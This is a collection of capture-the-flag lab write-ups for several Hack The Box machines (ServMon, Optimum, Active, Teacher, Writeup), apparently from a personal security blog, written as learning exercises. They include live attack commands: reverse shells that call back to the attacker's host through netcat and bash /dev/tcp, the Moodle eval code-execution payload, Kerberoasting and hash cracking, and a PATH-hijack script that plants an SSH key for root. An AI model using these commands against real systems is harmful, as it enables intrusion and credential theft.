PS C:\temp> (New-Object Net.WebClient).DownloadFile('http://10.10.14.33/nc64.exe','C:\temp\nc.exe')

Once I confirmed it had downloaded correctly, I copied B1nsec’s command to create the payload that executes the NetCat binary with SYSTEM privileges.

PS C:\temp> curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.33 443 -e cmd.ex
e"
Enter host password for user 'admin':
Added revshell as scripts\revshell.bat

Finally… I ran the command to execute the exploit.

PS C:\temp> curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m
Enter host password for user 'admin':
{"command":"revshell","lines":[{"message":"Command revshell didn't terminate within the timeout period 60s","perf":{}}],"result":3}

The reverse shell connected back to my attack machine and I was able to capture the root flag.

┌──(kali㉿kali)-[~/HTB/ServMon]
└─$ sudo nc -lvnp 443
[sudo] password for kali: 
listening on [any] 443 ...
whoami
connect to [10.10.14.33] from (UNKNOWN) [10.129.179.11] 49695
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
type root.txt
d50▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓04a

ServMon Learnings

I said some harsh things about this box during my writeup but in hindsight, the fault was with me. I’m not going to remove those comments because that’s how I felt at the time. This is a good box and once I understood the proper way to perform the privilege escalation, it was easy. The path to foothold was a lot of fun and was fairly simple. The directory traversal was practical and I like how the notes guided you to the file you needed.

The privilege escalation is simple if you do it correctly. Unfortunately, I went down every rabbit hole on the way to getting there. Everything I tried failed and it made me incredibly frustrated. I even started just looking for a flag online so that I could submit it and move on. However, in the end, persistence paid off. Granted I had to find the answer from another writeup but it taught me a lot along the way. I’m glad that this one is out of the way.

Optimum is an easy Windows box created by ch4p on Hack The Box. In order to own Optimum it is recommended that you have basic knowledge of Windows and knowledge of enumerating ports and services. By owning this box you will learn to identify vulnerable services, identify known exploits, and basic Windows privilege escalation techniques. Hello world, welcome to Haxez where today I will explain how I compromised Optimum.

Optimum Enumeration

To get started, I spawned the box and then connected to the HTB VPN. Next, I sent a ping to the box to check if it was online and that I could talk to it. Once the box responded, I started a Nmap scan that checked all ports, requested service versions, and ran default scripts. Then I saved the output in all formats and I set the minimum packet rate to 10,000. The results of the scan indicated that only one port was open. It was port 80 for HTTP and was running HttpFileServer 2.4. Furthermore, Nmap reported that the OS was Windows.

sudo nmap -sC -sV -p- 10.129.179.177 --min-rate 10000 -oA optimum

Web Application Enumeration

I launched Burp Suite and opened the browser. Next, I navigated to the IP address of the box which presented me with what appeared to be a file browser. There was a login option at the top of the page, the current directory, a search box, and a few other tools. At the bottom of the list of options, it confirmed that it was HttpFileServer 2.3.

I ran whatweb against the application to try and get more information. From the results, I learned that it was Rejetto file server. Furthermore, it also confirmed the server version and provided me with a few other bits of information. I also ran Nikto against the application but it didn’t come back with anything interesting.

whatweb -a3 http://10.129.179.177 -v

Foothold

I used searchsploit to search for exploits that affected Rejetto and sure enough a few remote code execution vulnerabilities. Furthermore, there was a Metasploit module for the exploit which should make life easier. I could attempt to perform the exploit manually but I’m short on time today so I will use the Metasploit module.

I launched Metasploit and searched for Rejetto. It was the only result so I told Metasploit to use it and then configured it. For example, I set the remote host to the IP of the box and the local host to my tun0 interface. Furthermore, I set the local port to 443 and then ran the exploit. Within a few seconds, I received a meterpreter reverse shell. I should note here that I tried a few other local ports which didn’t work.

From here, I was able to drop to a shell and capture the user flag from the C:\Users\kostas\Desktop directory.

meterpreter > shell
C:\Users\kostas\Desktop>type user.txt
type user.txt
8a5▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓0ce

Optimum Privilege Escalation

I used ctrl z to background return back to a meterpreter shell and then ran sysinfo. The target system was a 64-bit system but our meterpreter shell was only 32-bit. As a result, I ran ps to look for a 64-bit process to hijack. Explorer.exe was running and was 64bit so I told meterpreter to migrate to that process which was completed successfully.

Next, I used ctrl z to background the meterpreter session and searched for local exploit suggester in Metasploit. Once I found the correct module, I told Metasploit to use it and then listed out my sessions. I then configured the exploit suggester to use session 1 and ran it. And…. it hung.

My session was still active but I decided to switch out the payload for a 64-bit version and exploit it again. Perhaps the migration didn’t go smoothly. By switching to the 64-bit payload, my hope was that the local exploit suggester would run better.

set payload windows/x64/meterpreter/reverse_tcp

I then sent the meterpreter session to the background again and configured the local_exploit_suggester to use session 2. This time it worked and was much quicker than the first time I attempted it. There were a number of exploits that looked good but I accidentally tried to background Metasploit which killed the process so I had to start again. All on me that one. Fail.

Finally, after exploiting the box again I set the payload to the ms16_032 one. I then configured it to use tun0 (if you don’t do this, it won’t work). Then I ran the exploit and after some janky-looking text, I got a reverse shell and was able to capture the root flag.

meterpreter > shell
Process 1592 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
2a8▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓24e

Optimum Learnings

Optimum is a fun and quick box that I enjoyed every step of the way. It’s strange, I’ve had the user flag for a while and I can’t remember why I didn’t get the root. It was likely a combination of the 32-bit payload not working and my lack of knowledge early on. However, revisiting it today was a blast. I want to come back to it and attempt it without using Metasploit. It was a great box to do just before starting my 9-5. I feel like this is a perfect difficulty level for easy boxes.

The foothold was fairly simple although I had some issues when using higher local port numbers. Once on the box, the privilege escalation was easy once I switched to the 64-bit payload. Granted, you won’t learn much unless you go and research the exploits yourself but I feel like easy boxes should be learning to use tools more than anything. Anyway, thanks for the box.

Active is an easy Windows box created by eks & mrb3n on Hack The Box. The skills required to complete this box are a basic knowledge of Active Directory authentication and shared folders. By completing this box you will learn SMB enumeration techniques, Group Policy Preferences Groups.xml enumeration and exploitation, Identification, and exploitation of Kerberoastable accounts. Hello world, welcome to Haxez where today I will explain how I hacked Active.

Enumerating Active

Once connected to the VPN, I pinged the box to check if I could talk to it and then proceeded to run the standard Nmap scan. I scanned all ports, requested versions, ran default scripts, and saved the output in all formats. Looking at the results I suspected that the box was a Domain Controller as it had all the usual suspects. DNS, Kerberos, LDAP, and SMB were all open so there was plenty to get started with.

sudo nmap -sC -sV -p- 10.129.193.5 --min-rate 10000 -oA active

Active Server Message Block Enumeration

I ran smbmap against the box to see whether I could access any shares. Sure enough, I had read-only access to the Replication share. Next, I attempted to connect to the replication anonymously with smbclient. That worked so I turned recursive mode on, turned prompts off, and downloaded all the files. While the files were downloading I noticed a file named Groups.xml. In earlier versions of Windows, the Group Policy Preferences feature stored passwords and other sensitive information related to local groups in an XML file called “Groups.xml.”

smbmap -H 10.129.193.5

smbclient //10.129.193.5/Replication
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

I checked the Groups.xml file and found the value of the cpassword variable. Then, I used gpp-decrypt to decrypt the password which identified the password as GPPstillStandingStrong2k18.

cat /home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ                                            
GPPstillStandingStrong2k18

Authenticated Active Server Message Block Enumeration

Now that I had a password, I ran smbmap again to see whether I had access to any additional shares. As you can see from the screenshot below, I now had read-only access to a few additional shares including the Users directory.

smbmap -u svc_tgs -p GPPstillStandingStrong2k18 -d active.htb -H 10.129.193.5

As a result, I used smbclient to connect to the Users share to have a look around. After a bit of poking around I found the user.txt flag in the svc_tgs users desktop directory. I downloaded it which allowed me to capture the user flag.

smbclient //10.129.193.5/Users -U active.htb/svc_tgs
smb: \> get SVC_TGS\Desktop\User.txt
cat user.txt   
962▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓74a

Release The Hounds

Since I had credentials, I thought the next best step would be to run Bloodhound and see what information I could obtain about the domain. As a result, I used the bloodhound-python tool to collect the data and then imported it into Bloodhound.

bloodhound-python --dns-tcp -ns 10.129.193.5 -d active.htb -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'

Next, I imported the data to Bloodhound and ran a few queries. Unfortunately, it seems that the collection didn’t work as intended. When running the List all Kerberostable Accounts query, I received no results from Bloodhound. It should have shown me that the Administrator user was vulnerable.

Kerberoasting

Even though Bloodhound didn’t show the administrator as being vulnerable to Kerberoasting, I continued with the attack anyway. I will have to come back to it and find out why Bloodhound didn’t find it. Perhaps it was the Python collector doing something funny. Anyway, I ran the GetUsersSPNs.py script from Impaket and was able to grab the administrator hash.

GetUserSPNs.py -request -dc-ip 10.129.193.5 active.htb/svc_tgs

Hash Cracking

Next, I saved a copy of the hash to a file called hash.txt. I then used hashcat mode 13100 in combination with the rockyou wordlist to crack the hash.

sudo hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

With the password cracked, I was able to use psexec.py to connect to the machine as the Administrator and capture the final flag.

psexec.py active.htb/[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.193.5.....
[*] Found writable share ADMIN$
[*] Uploading file utdeQdHw.exe
[*] Opening SVCManager on 10.129.193.5.....
[*] Creating service QIAd on 10.129.193.5.....
[*] Starting service QIAd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
345▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓1a5

Active Learnings

Overall, I enjoyed this box. It was a great box for reinforcing existing skills such as SMB enumeration. Getting the user flag was easy which is what I want from an easy box. It taught me about the Groups.xml file from GPP so I now know something I didn’t before.

I’m still not sure why Bloodhound didn’t show the Administrator as being Kerbarostable but I might come back to that tonight and take another look. However, I feel that the Bloodhound step could have been avoided anyway if I had just run the right tool. Anyway, great easy box.

Teacher is an easy Linux box created by mrh4sh on Hack The Box. The official walkthrough states that it’s a medium box. However, it is categorized as an easy box in the machines section. It is recommended that you have basic Linux and MySQL knowledge to complete this box. By completing this box you will learn Website Enumeration, Password Brute-Forcing, Moodle Quiz Module Exploitation, Database Enumeration, Password Cracking, and Linux Symlink Misconfiguration. Hello world, welcome to Haxez where today I will be explaining how I hacked Teacher.

Teacher Enumeration

First, I spawned the box and connected my attack box to the Hack The Box VPN. Once connected, I sent a ping request to the box to ensure it was online. Then I performed a Nmap scan to check what ports were open. Furthermore, I requested the service versions, asked for default scripts to be run, and that the minimum packet rate was 10000. Finally, I saved the output in all formats to files called teacher. From the results, I learned that only port 80 for HTTP was open and that it was running Apache 2.4.25.

sudo nmap -sC -sV -p- 10.129.202.224 --min-rate 10000 -oA teacher

Teacher Web Application Enumeration

Since port 80 was the only open port, I headed over to the application. There wasn’t a great deal of functionality offered by the application. It seemed fairly generic with few pages that I could interact with. For an application that calls itself Blackhat Highschool, it seemed a bit too clean. I was hoping for something dark and edgy.

Moving on, I ran whatweb against the application which told me it was an HTML 5 application with JQuery 1.11.1. Next, I navigated to index pages with various different extensions (index.html, index.php). Sure enough, the one that loaded the main page was index.html.

As I didn’t have much to go on, I decided to run gobuster to look for hidden content. Perhaps there was a hidden directory or a secret file telling me that the princess is in another castle. I told gobuster to perform a directory attack using the raft-small-words.txt wordlist in SecLists. Furthermore, I also asked it to try various different extensions and set the thread count to 50.

Moodle

As a result, I learned that there was a directory called Moodle. Their GitHub page explains that Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License. Moodle is used for blended learning, distance education flipped classrooms, and other online learning projects in schools, universities, workplaces, and other sectors. I headed to the Moodle directory but received an error because it redirected to teacher.htb. Therefore, I added the IP address and teacher.htb domain to my /etc/hosts file and revisited the directory. Abracadabra, the site started loading.

Picture In Picture

I honestly don’t know what to say about this part of the box. I know I wouldn’t have found it if it wasn’t for a walkthrough. It’s not something I regularly check. I found Moodle but had no way to log in. However, directory listing on the images directory was enabled. Visiting each of the images loaded an image as expected, except for 5.png.

I downloaded the picture locally and used less to review the contents of the file. It wasn’t an image at all. It appeared to be a helpdesk ticket. I can’t fathom how a helpdesk ticket would have ended up on the website. For my own sanity, I’m going to pretend that the helpdesk agent and web developer are the same person. Furthermore, I’m also going to pretend that they accidentally renamed the wrong file and uploaded it. The ticket gave me the username Giovanni and a partial password of Th4C00lTeacha.

Moodle Bruteforce

I launched Burp and headed back to the Moodle login page. Next, I populated the login form with the credentials provided in the support ticket. Then, I clicked submit and located the login request in Burp’s HTTP history. I sent the request to the intruder tool and added a character to the end of the password. Then, I highlighted that character and added the payload characters.

Next, I navigated to the payload tab but because I’m using Burp community edition, I had to create my own payloads. As a result, I combined several wordlists from the SecLists fuzzing directory so that they contained numbers 0 to 9, all alphabetical characters (lower and uppercase), and all special characters.

I then click the start attack button and watched as Burp went through each payload, appending it to the end of the password. There are other tools that I could have used to do this such as WFUZZ or FFUF but I know how to use Burp so I thought it was the best option. An indication that a specific payload has had a different result is the length of the response produced by the application. The screenshot below shows that most of the responses were 868 characters. However, the payload with the # symbol produced a response with 993 characters.

Evil Teacher Vulnerability

I wasn’t sure what the Moodle version was. I ran what web again against the teacher.htb domain Moodle directory but got nothing. As a result, I looked on Google and found that the Moodle version can be found from the Moodle Docs for this page link at the bottom of a course page. This told me that it was Moodle version 3.4.

There is a vulnerability in Moodle 3.4 with the CVE designation CVE-2018-1133. The vulnerability is also known as Evil Teacher. It could allow a user with the teacher role to perform code execution by creating a quiz. SonarSource has an excellent writeup on it so I’m not going to attempt to explain it in too much detail. Essentially, formulas are passed to an eval function which allows for code execution. So if a threat actor can create a quiz with a malicious formula in one of the questions, they may be able to execute code.

Teacher Foothold

I navigated to the algebra page and enabled editing. Next, I used the add an activity or resource option to add a quiz to the Topic 1 section.

I gave the quiz a name and description and clicked next.

After that, I clicked the little blue add link on the next page and chose to add a question. Then, I selected the calculated question type as that would be likely to have the option to add a formula. Finally, I pasted the working exploit into the formula and changed the grad value to 100%.

/*{a*/`$_GET[0]`;//{x}}

It was time for the moment of truth. I captured the request with Burp and sent it to the repeater tool. Next, I appended the URL with a payload that would ping my box. I started tcpdump to listen out for ICMP packets that hit my tun0 adaptor and clicked send.

GET /moodle/question/question.php?returnurl=%2Fquestion%2Fedit.php%3Fcmid%3D7&appendqnumstring&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=/bin/ping+10.10.14.34 HTTP/1.1

sudo tcpdump -i tun0 -n icmp

To my surprise, it worked the first time. I started receiving ping packets from the target box.

Now that I had code execution, I modified my payload to a reverse shell, started netcat, and was able to pop a reverse shell.

GET /moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D8%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=8&0=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.34/9001+0>%261' HTTP/1.1

Teacher System Enumeration

I couldn’t find the user flag once logged in so I checked the home directory and that there was a user called giovanna. That’s probably where the user.txt file is. I could try switching to that user with the password we logged in to Moodle with. However, I decided to take a look at the database first. I pulled the username and password from the /var/www/html/moodle/config.php file. After logging in, I was able to grab usernames and password hashes from the mdl_users table.

select id,username,password from mdl_user;

I copied the Giovannibak hash to a file on my attack box and used John to crack it with the rockyou wordlist.

I was then able to switch to the giovanni user and capture the user.txt flag.

www-data@teacher:/var/www/html/moodle$ su giovanni
su giovanni
Password: expelled
giovanni@teacher:/var/www/html/moodle$ cd ~/
cd ~/
giovanni@teacher:~$ ls
ls
user.txt  work
giovanni@teacher:~$ cat user.txt
cat user.txt
881▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓823

Teacher Privilege Escalation

The box keeps crashing meaning I have to do the above process all over again. As a result, the following explanation is going to be brief because I simply can’t be bothered with this box anymore. Looking at the time stamps on the user’s home directory I could see that something was changing fairly frequently. I set up a Python webserver and download pspy onto the box. Running pspy I noticed that a backup script was running.

The backup script was changing to the /home/giovanni/work directory and then backing up the courses directory. It was then changing the directory to /home/giovanni/work/tmp and changing the permissions to 777.

giovanni@teacher:/var/www/html/moodle/question$ cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

You may have to forgive me here as I’ve reached the end of my tether. I had to restart the box about 5 times due to it crashing repeatedly. All I did was create a symbolic link from courses to /root. That way, when the script runs, the contents of the root directory will be backed up to work/tmp/courses which will allow me to capture the root flag.

giovanni@teacher:~/work$ ln -s /root courses
giovanni@teacher:~/work$ ls -laSh courses
giovanni@teacher:~/work$ ls
courses  courses.bak  tmp
giovanni@teacher:~/work$ cd tmp
giovanni@teacher:~/work/tmp$ ls
backup_courses.tar.gz  courses
giovanni@teacher:~/work/tmp$ cd courses
giovanni@teacher:~/work/tmp/courses$ ls
algebra  root.txt
giovanni@teacher:~/work/tmp/courses$ cat root.txt
cat root.txt
63d▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓3cc

Teacher Learnings

Ironically, I didn’t learn a lot from the teacher box. The Moodle exploit was interesting as I hadn’t done it before but that was about it. Unfortunately, I have to say that this is one of my least favorite boxes that I’ve completed so far. The concept is nice but the box was too flakey, well for me it was anyway. It seemed that the slightest mistake in syntax caused the box to throw a tantrum. This is on a private VIP box too so not like other people were hitting it.

I think enabling SSH would have made the box more tolerable as it would have allowed quick access to the user. I wouldn’t want this on every box but having to repeat the Moodle exploit every time the box decided to stop responding made me want to quit. Well, it’s done now and I can put it behind me. Glad I did it but didn’t enjoy it. Thanks for the box!

Writeup is an easy Linux box created by jkr on Hack The Box. The box has protections in place to prevent brute-force attacks. The skills required to complete this box are enumeration. The skills obtained from completing this box are process enumeration and path hijacking. Hello world, welcome to Haxez where today I will be explaining how I hacked the Hack The Box Writeup box.

Enumerating Writeup

First, I spawned the box and connected my attack box to the Hack The Box lab VPN. Next, I sent a ping to the target to ensure it was online and that I could talk to it. Once the box responded, I performed a Nmap scan targeting all ports. Furthermore, I also requested service versions, told it to run default scripts, gave it a minimum packet rate of 10,000, and told it to save the output in all formats named writeup. As you can see from the screenshot below, ports 22 for SSH and 80 for HTTP were open.

sudo nmap -sC -sV -p- 10.129.95.203 --min-rate 10000 -oA writeup

Web Application Enumeration

Since SSH was unlikely to be the intended attack vector, I moseyed on over to the web application for a gander. It’s… beautiful! The web application appeared to be an in-development blog for Hack The Box writeups. However, the application was being hit with denial-of-service attacks resulting in DoS protection mechanisms being implemented. The DoS protection blocks any IP that triggers a 400 error in the Apache log.

Domo arigato, Mr Roboto

Dirb, gobuster, ffuf, and other directory and file brute force tools are noisy and would generate 400 errors resulting in an IP ban. Therefore, I had to manually and carefully enumerate the web application. One of the first files I look for when hacking web applications is the robots.txt file. It’s a file that tells search indexing robots to ignore the files contained within it. It prevents pages like admin or log-in from being indexed. However, it’s a double-edged sword as it may disclose sensitive information to malicious threat actors. Navigating to the robots.txt file I found a directory called writeup.

Enumerating Writeup Technologies

I navigated to the writeup directory which presented a basic web application with minimal functionality. There were several links to blog posts and clicking on those blog posts revealed that it was a PHP-based application. Furthermore, a parameter named page was being used to retrieve the blog posts. For example, visiting the following URL would retrieve a blog post called blue http://10.129.95.203/writeup/index.php?page=blue. I used whatweb to identify the CMS or Content Management System. As a result, I learned that it was using a version of CMS-Made-Simple from 2004-2019.

Furthermore, looking at the structure of the CMS I found the location of the changelog file. Navigating to the file revealed the specific version of the CMS being used.

CMS Made Simple Blind SQL Injection Failures

Using searchsploit to search for vulnerabilities impacting CMS Made Simple, I found a blind SQL injection vulnerability. The vulnerability has a CVE designation of CVE-2019-9053. I located the Python script and copied it to my current working directory. You can do this with the searchsploit -m flag to mirror it.

Unfortunately, attempting to run this exploit produced errors regarding print statements. I wasn’t sure what to do here as I’m crap at Python. Fortunately, IppSecs video explained that I needed to install the termcolor module with pip. While this didn’t resolve the problem, it did point me in the right direction.

First, I had to install pip2.7 which I was able to do by following the post >>HERE<<

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2.7 get-pip.py

However, when attempting to install termcolor, I received errors about an egg or something. After a bit more Google searching, I found this post >>HERE<< which explained I needed to upgrade setuptools.

pip install --upgrade setuptools

CMS Made Simple Blind SQL Injection Success

I was finally ready to run the payload. Using the following command, I was able to attack the SQL injection vulnerability and retrieve a salt, username, email address, and password hash. It was awesome watching the script come alive and iterate through the alphabet and pull the information out of the database.

python2.7 46635.py --url http://10.129.95.203/writeup

Writeup Foothold

I echoed the hash followed by a colon, followed by the salt into a file called jkrhash.txt.

echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > jkrhash.txt

Next, I used hashcat with mode 20 (MD5 salt and password) to crack the hash with the wordlist rockyou.

hashcat -a 0 -m 20 jkrhash.txt /usr/share/wordlists/rockyou.txt

I was in, I was able to use the credentials to SSH to the box as the jkr user. Furthermore, once on the box, I was able to capture the user flag.

jkr@writeup:~$ cat user.txt
8d0▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓9e9

Writeup System Enumeration

After grabbing the user flag, I started enumerating the system. First, I checked the command history of the jkr user to see if it contained anything interesting. It didn’t. Next, I checked if I could run sudo -l to see what commands jkr could run as sudo. Interestingly, sudo wasn’t found on the system. Finally, I decided to go for the easy option and ran linpeas. I span up a Python webserver and used wget to download it to the /tmp directory. Then, I gave it executable permissions and ran it.

The output kept highlighting the /usr/local path as a privilege escalation vector but I didn’t know why. After a bit more investigation, it seems that the jkr user is part of the staff group. According to the Debian wiki the staff group allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name). As you can see from the screenshot below, /usr/local/bin is also the first path that gets called when executing files.

Writeup Process Enumeration

I’m still getting my head around this privilege escalation method if I’m honest. However, I think I understand it. To explain, the jkr user is a member of the staff group and the staff group has the ability to modify /usr/local/ without root privileges. If I can find a binary that gets executed as root without it using the absolute file path, then I can drop a malicious binary of the same name inside the /usr/local/bin directory. Then, when the conditions are met for the binary to be executed, my malicious binary gets executed with root privileges because my first environmental path is /usr/local/bin.

With that in mind, I ran pspy32 and found that when I log in to SSH with jkr, the run-parts binary is executed without an absolute file path. You can see it in the image below, the third blue line from the bottom.

Next, I checked to see the ownership of the run-parts binary to see if it was owned by root. I used which to locate it and then ran ls -lash to list the permissions. Sure enough, it was owned by root and genuinely appeared to be the only binary not being executed with a full file path.

Writeup Privilege Escalation

In theory, I should now be able to create my own binary or script called run-parts in /usr/local/bin. Then when I SSH to the system as jkr, my malicious run-parts binary will be executed instead of the one in /bin. There are multiple methods that I could have used to do this. For example, I could have created a script that copied the bash binary to /tmp and gave it setuid capabilities (I think). Additionally, I could have created a reverse shell that connected back to my machine. However, I thought the most reliable method was to drop an SSH key in the root user’s authorized_keys file. Plus, this is the method that IppSec used and it seemed to work.

When the script is executed, it creates a file in /tmp called Exploit-Complete. This isn’t required as it’s just a visual indicator to show that the script was executed. Next, it creates the .ssh directory in the root user’s directory. Then, it echos my public key into the root user’s authorized_keys file. Finally, it gives the file 600 permissions. The script is saved as run-parts and saved to /usr/local/bin. I created it using nano.

#!/bin/bash
touch /tmp/Exploit-Complete
mkdir /root/.ssh
echo 'ssh-rsa AAAA <<<SNIP>>> QqNzw9WKiU0= kali@kali' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Once the file was saved, I made it executable by running chmod +x against it. Then I created a new terminal tab and connected back to the box as the jkr user. I checked the /tmp directory and sure enough, the Exploit-Complete file had been created. Hopefully, that means that my public key is now in the root user’s authorized_keys files.

Finally, I connected SSH as the root user using the private key I generated. I was able to login and grab the root flag.

┌──(kali㉿kali)-[~/HTB/Writeup]
└─$ ssh -i root [email protected]
Last login: Fri Aug  6 08:59:19 2021
root@writeup:~# cat root.txt
786▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓4b4

Writeup Learnings

This was a fun box which I learned a few things from. The first was getting the Python SQL injection payload to work. As soon as I received that first error I immediately thought that I wasn’t going to be able to complete the box. However, after a bit of persistence, the payload worked and left me with a big grin on my face. The cracking was fairly simple but always good to get some practice.

The system enumeration and privilege escalation was interesting. I didn’t know about the staff group before and without guides pointing me in the right direction, I wouldn’t have got it. I’m starting to understand the brilliance of pspy too, without it, I’m not sure how I would have identified the correct binary. Overall this is a good box and has a nice method for practicing different techniques for privilege escalation. You could change your binary to perform different things and then easily trigger it by connecting back to the box. Thanks, jkr, fun box.